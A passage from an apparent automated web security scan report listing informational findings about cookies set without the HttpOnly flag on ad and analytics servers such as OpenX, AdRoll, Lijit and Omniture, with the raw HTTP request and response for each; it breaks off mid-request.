13.34. http://ce.lijit.com/merge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=2&3pid=E3F32BD05A8DDF4D5646D79640088B HTTP/1.1
Host: ce.lijit.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_ts=t=1305981518646479; ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; tpro_inst=269d9846e9d950257f8d2f16e66681e2; tpro=eJxVUdtuhSAQ%2FJd9JmYRL9Xf6ONJQwiikigY0CaN8d%2B7YM457dvsMjM7oydswY92MdCfMBk3mJDQqtIGi5bBaJ6DuBioKTOF5CWtGHBC7Y0%2BpKgyrWIgall1aajIoUa5LUdMI%2B%2FIIyidTbQ6NPScTMcg1ZpdVLTKZTTbuGXg9zmFQlLq2S5DMC6pnU%2BGHcl%2FTPbG5G2d9mt2RynwXlMclA0%2BszUoOd5TTbHxna4s0w2%2FLOZu6bzLxavmzxqLmm5OQQ0y6jlfEBfpot1TjseZEfTwufmwR6BOO7UU2HZN2ZXNxV6MUbloBzMUlPkfTzQ1v75e1el%2F7Da1er8yWP0gtT8ciUoG3yZE6%2BnDAC8QrusXAdOE%2Fw%3D%3D; ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:28 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n28 ( iad-agg-n33), ms iad-agg-n33 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Sat, 25 Jun 2011 17:04:28 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJSslJyNXYzNnJyMTB1tHBxcTNxMTUzMXMxtzQzMTCwsHBSqgUAqREIvw%3D%3D; expires=Sat, 23-Jun-2012 17:04:28 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;
13.35. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM?pv=26143364701.420067&cookie=ABL75QCUY5EGNEJJXWHGIG%3A1%7C36AMQQX26NAKPETSLKXA3W%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A2&width=468&height=60&x=0&y=0&keyw=&cpm=g)))TgSPJQAHQHIK5XdUBd5fQRecsO_YZwjowKwVMA HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4422256122899399&output=html&h=60&slotname=2204023174&w=468&lmt=1308927567&flash=10.3.181&url=http%3A%2F%2Fphuket.com%2F&dt=1308921637628&bpp=5&shv=r20110615&jsv=r20110616&correlator=1308921637930&frm=4&adk=1151138738&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=791522303&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=36813006&fu=0&ifi=1&dtd=426&xpc=k1mQeRIDm4&p=http%3A//phuket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=d10276ea02f90b643e343970f448660f

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Fri, 24 Jun 2011 13:20:41 GMT
Connection: keep-alive
Set-Cookie: __adroll=d10276ea02f90b643e343970f448660f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/r/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/aa124d880659045d2ecfa27a65500c85.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

13.36. http://d1.openx.org/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /afr.php?zoneid=35367&cb=6000922605252282751 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OACCAP=86574.1; _OXBLC[386363]=lnaqh8; _OXLCA[386363]=lnaqei-15402+93539e93b53b87ab2a8a99fdf1fe32b6; OAID=62614e7a17a25044ace97fcfa762d977

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Set-Cookie: _OXLCA[386363]=deleted; expires=Thu, 24-Jun-2010 13:22:20 GMT; path=/
Set-Cookie: %5FOXLCA%5B386363%5D=deleted; expires=Thu, 24-Jun-2010 13:22:20 GMT; path=/
Set-Cookie: _OXBLC[386363]=deleted; expires=Thu, 24-Jun-2010 13:22:20 GMT; path=/
Set-Cookie: %5FOXBLC%5B386363%5D=deleted; expires=Thu, 24-Jun-2010 13:22:20 GMT; path=/
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=62614e7a17a25044ace97fcfa762d977; expires=Sat, 23-Jun-2012 13:22:21 GMT; path=/
Set-Cookie: OXLCA=386363.lnaqei-15402+93539e93b53b87ab2a8a99fdf1fe32b6; expires=Sat, 23-Jun-2012 13:22:21 GMT; path=/
Set-Cookie: OXBLC=386363.lnaqh8; expires=Sat, 23-Jun-2012 13:22:21 GMT; path=/
Content-Length: 382
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
13.37. http://d1.openx.org/avw.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /avw.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /avw.php?zoneid=34921&cb=597521837&n=abc06acb HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/premium-packages/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OACCAP=86574.1; OXLCA=386363.lnaqei-15402+93539e93b53b87ab2a8a99fdf1fe32b6_511540.lnaqh9-180385+48b965d5adcdccba524ab16c26a1ca6b_60986.lnaqh9-30878+696d3c91b931d05490343895e8327245; OXBLC=386363.lnaqh8_511540.lnaqhc_60986.lnaqhf; OAID=62614e7a17a25044ace97fcfa762d977

Response

HTTP/1.1 302 Found
Date: Fri, 24 Jun 2011 13:22:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Set-Cookie: _OXLCA[386363]=deleted; expires=Thu, 24-Jun-2010 13:22:42 GMT; path=/
Set-Cookie: %5FOXLCA%5B386363%5D=deleted; expires=Thu, 24-Jun-2010 13:22:42 GMT; path=/
Set-Cookie: _OXLCA[511540]=deleted; expires=Thu, 24-Jun-2010 13:22:42 GMT; path=/
Set-Cookie: %5FOXLCA%5B511540%5D=deleted; expires=Thu, 24-Jun-2010 13:22:42 GMT; path=/
Set-Cookie: _OXLCA[60986]=deleted; expires=Thu, 24-Jun-2010 13:22:42 GMT; path=/
Set-Cookie: %5FOXLCA%5B60986%5D=deleted; expires=Thu, 24-Jun-2010 13:22:42 GMT; path=/
Set-Cookie: _OXBLC[386363]=deleted; expires=Thu, 24-Jun-2010 13:22:42 GMT; path=/
Set-Cookie: %5FOXBLC%5B386363%5D=deleted; expires=Thu, 24-Jun-2010 13:22:42 GMT; path=/
Set-Cookie: _OXBLC[511540]=deleted; expires=Thu, 24-Jun-2010 13:22:42 GMT; path=/
Set-Cookie: %5FOXBLC%5B511540%5D=deleted; expires=Thu, 24-Jun-2010 13:22:42 GMT; path=/
Set-Cookie: _OXBLC[60986]=deleted; expires=Thu, 24-Jun-2010 13:22:42 GMT; path=/
Set-Cookie: %5FOXBLC%5B60986%5D=deleted; expires=Thu, 24-Jun-2010 13:22:42 GMT; path=/
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=62614e7a17a25044ace97fcfa762d977; expires=Sat, 23-Jun-2012 13:22:43 GMT; path=/
Set-Cookie: OAVARS[abc06acb]=a%3A4%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A70725%3Bs%3A4%3A%22r_id%22%3Bs%3A32%3A%227b473704b44c3bb90f60878059451fa3%22%3Bs%3A4%3A%22r_ts%22%3Bs%3A6%3A%22lnaqhv%22%3Bs%3A6%3A%22oadest%22%3Bs%3A25%3A%22http%3A%2F%2Fwww.latestays.com%2F%22%3B%7D; path=/
Set-Cookie: OXLCA=386363.deleted_511540.deleted_60986.deleted; expires=Sat, 23-Jun-2012 13:22:43 GMT; path=/
Set-Cookie: OXBLC=386363.deleted_511540.deleted_60986.deleted; expires=Sat, 23-Jun-2012 13:22:43 GMT; path=/
Location: http://www.images.awd.ws/ads/global/remnant/latestays184x56.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.38. http://d1.openx.org/ck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /ck.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ck.php?oaparams=2__bannerid=60986__zoneid=30878__cb=aafc97d899__r_id=696d3c91b931d05490343895e8327245__r_ts=lnaqh9__oadest=http%3A%2F%2Fwww.phuket-travel.com%2Fnightlife%2Ffantasea.htm%3Fpid%3DAWDINP1356 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OACCAP=86574.1; OXLCA=386363.lnaqei-15402+93539e93b53b87ab2a8a99fdf1fe32b6; OXBLC=386363.lnaqh8; _OXBLC[511540]=lnaqhc; _OXLCA[511540]=lnaqh9-180385+48b965d5adcdccba524ab16c26a1ca6b; OAID=62614e7a17a25044ace97fcfa762d977

Response

HTTP/1.1 302 Found
Date: Fri, 24 Jun 2011 13:22:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Set-Cookie: _OXLCA[511540]=deleted; expires=Thu, 24-Jun-2010 13:22:26 GMT; path=/
Set-Cookie: %5FOXLCA%5B511540%5D=deleted; expires=Thu, 24-Jun-2010 13:22:26 GMT; path=/
Set-Cookie: _OXLCA[386363]=deleted; expires=Thu, 24-Jun-2010 13:22:26 GMT; path=/
Set-Cookie: %5FOXLCA%5B386363%5D=deleted; expires=Thu, 24-Jun-2010 13:22:26 GMT; path=/
Set-Cookie: _OXLCA[60986]=deleted; expires=Thu, 24-Jun-2010 13:22:26 GMT; path=/
Set-Cookie: %5FOXLCA%5B60986%5D=deleted; expires=Thu, 24-Jun-2010 13:22:26 GMT; path=/
Set-Cookie: _OXBLC[511540]=deleted; expires=Thu, 24-Jun-2010 13:22:26 GMT; path=/
Set-Cookie: %5FOXBLC%5B511540%5D=deleted; expires=Thu, 24-Jun-2010 13:22:26 GMT; path=/
Set-Cookie: _OXBLC[386363]=deleted; expires=Thu, 24-Jun-2010 13:22:26 GMT; path=/
Set-Cookie: %5FOXBLC%5B386363%5D=deleted; expires=Thu, 24-Jun-2010 13:22:26 GMT; path=/
Set-Cookie: _OXBLC[60986]=deleted; expires=Thu, 24-Jun-2010 13:22:26 GMT; path=/
Set-Cookie: %5FOXBLC%5B60986%5D=deleted; expires=Thu, 24-Jun-2010 13:22:26 GMT; path=/
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=62614e7a17a25044ace97fcfa762d977; expires=Sat, 23-Jun-2012 13:22:27 GMT; path=/
Set-Cookie: OXLCA=386363.deleted_511540.deleted_60986.lnaqh9-30878+696d3c91b931d05490343895e8327245; expires=Sat, 23-Jun-2012 13:22:27 GMT; path=/
Set-Cookie: OXBLC=386363.deleted_511540.deleted_60986.lnaqhf; expires=Sat, 23-Jun-2012 13:22:27 GMT; path=/
Location: http://www.phuket-travel.com/nightlife/fantasea.htm?pid=AWDINP1356
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.39. http://d1.openx.org/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=456558&campaignid=217835&zoneid=35369&loc=http%3A%2F%2Fphuket.com%2F&cb=fd2a62496c&r_id=59eb7d6f2c5d9c9ed6739d0264b5016a&r_ts=lnaqec HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?zoneid=35369&cb=-3648526499830615387
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OACCAP=86574.1; OAID=62614e7a17a25044ace97fcfa762d977

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=62614e7a17a25044ace97fcfa762d977; expires=Sat, 23-Jun-2012 13:20:36 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
13.40. http://d1.openx.org/spc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /spc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spc.php?zones=right-ads%20pos%200%3D180385%7Cright-ads%20pos%201%3D30875%7Cright-ads%20pos%202%3D30878%7C&nz=1&source=&r=40179861&block=1&charset=UTF-8&loc=http%3A//www.phuket-travel.com/nightlife/fantasea.htm%3Fpid%3DAWDINP1356&referer=http%3A//www.phuket-travel.com/ HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/nightlife/fantasea.htm?pid=AWDINP1356
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OACCAP=86574.1; _OXBLC[60986]=lnaqhf; _OXLCA[60986]=lnaqh9-30878+696d3c91b931d05490343895e8327245; OAID=62614e7a17a25044ace97fcfa762d977; OXLCA=386363.lnaqei-15402+93539e93b53b87ab2a8a99fdf1fe32b6_511540.lnaqh9-180385+48b965d5adcdccba524ab16c26a1ca6b; OXBLC=386363.lnaqh8_511540.lnaqhc

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Set-Cookie: _OXLCA[60986]=deleted; expires=Thu, 24-Jun-2010 13:22:34 GMT; path=/
Set-Cookie: %5FOXLCA%5B60986%5D=deleted; expires=Thu, 24-Jun-2010 13:22:34 GMT; path=/
Set-Cookie: _OXLCA[386363]=deleted; expires=Thu, 24-Jun-2010 13:22:34 GMT; path=/
Set-Cookie: %5FOXLCA%5B386363%5D=deleted; expires=Thu, 24-Jun-2010 13:22:34 GMT; path=/
Set-Cookie: _OXLCA[511540]=deleted; expires=Thu, 24-Jun-2010 13:22:34 GMT; path=/
Set-Cookie: %5FOXLCA%5B511540%5D=deleted; expires=Thu, 24-Jun-2010 13:22:34 GMT; path=/
Set-Cookie: _OXBLC[60986]=deleted; expires=Thu, 24-Jun-2010 13:22:34 GMT; path=/
Set-Cookie: %5FOXBLC%5B60986%5D=deleted; expires=Thu, 24-Jun-2010 13:22:34 GMT; path=/
Set-Cookie: _OXBLC[386363]=deleted; expires=Thu, 24-Jun-2010 13:22:34 GMT; path=/
Set-Cookie: %5FOXBLC%5B386363%5D=deleted; expires=Thu, 24-Jun-2010 13:22:34 GMT; path=/
Set-Cookie: _OXBLC[511540]=deleted; expires=Thu, 24-Jun-2010 13:22:34 GMT; path=/
Set-Cookie: %5FOXBLC%5B511540%5D=deleted; expires=Thu, 24-Jun-2010 13:22:34 GMT; path=/
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=62614e7a17a25044ace97fcfa762d977; expires=Sat, 23-Jun-2012 13:22:35 GMT; path=/
Set-Cookie: OXLCA=386363.deleted_511540.deleted_60986.deleted; expires=Sat, 23-Jun-2012 13:22:35 GMT; path=/
Set-Cookie: OXBLC=386363.deleted_511540.deleted_60986.deleted; expires=Sat, 23-Jun-2012 13:22:35 GMT; path=/
Content-Length: 2993
Connection: close
Content-Type: application/x-javascript; charset=UTF-8

var OA_output = new Array();
OA_output['right-ads pos 0'] = '';
OA_output['right-ads pos 0'] += "<"+"a href=\'http://d1.openx.org/ck.php?oaparams=2__bannerid=511540__zoneid=180385__OXLCA=1__cb=279b0b
...[SNIP]...
13.41. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467?[AQB]&ndh=1&t=24/5/2011%208%3A48%3A13%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&events=event2&c1=Not%20Logged%20In&c2=4394%20Official%20EA%20Twitter%20Accounts&v2=4394%20Official%20EA%20Twitter%20Accounts&v8=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c10=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c15=EA%20Support&pid=View%20Answer&pidt=1&oid=http%3A//support.ea.com/app/ask&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:14 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:48:14 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:48:14 GMT
Last-Modified: Sat, 25 Jun 2011 13:48:14 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E04959E-3682-6FD6BEE2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www337
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
13.42. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727?[AQB]&ndh=1&t=24/5/2011%208%3A47%3A32%205%20300&ce=UTF-8&pageName=Support%20Home&g=http%3A//support.ea.com/&cc=USD&c1=Not%20Logged%20In&v8=aU84DuwUwY9gAhoN137mIdeb2MlklSkQKAUA_1uW_w4uKV9mqls6n6fRxH0x0NYUkUmialo2t8WgxRqvPN%7EF3ORX9u_4mKmEchm_Tu0t1DvdTRtxLfbbx5ltTw8s9D4UMa_uRcumg2x9NzthyDo%7EU%7Eihqm2dEGCf5UP50ehVCmce5Kj9V1rZC6PP4P2bZGCViFgvJMmYy6oXQBcQY3Yz%7EHv0U62RjTo2adFX6Vp02V3lm5rIQLUnvKHVfSwG5ttISZcxk4BKJF8cI%21&c10=aU84DuwUwY9gAhoN137mIdeb2MlklSkQKAUA_1uW_w4uKV9mqls6n6fRxH0x0NYUkUmialo2t8WgxRqvPN%7EF3ORX9u_4mKmEchm_Tu0t1DvdTRtxLfbbx5ltTw8s9D4UMa_uRcumg2x9NzthyDo%7EU%7Eihqm2dEGCf5UP50ehVCmce5Kj9V1rZC6PP4P2bZGCViFgvJMmYy6oXQBcQY3Yz%7EHv0U62RjTo2adFX6Vp02V3lm5rIQLUnvKHVfSwG5ttISZcxk4BKJF8cI%21&c15=EA%20Support&pid=Support%20Home&pidt=1&oid=javascript%3Avoid%28openPositionedWindow%28%27http%3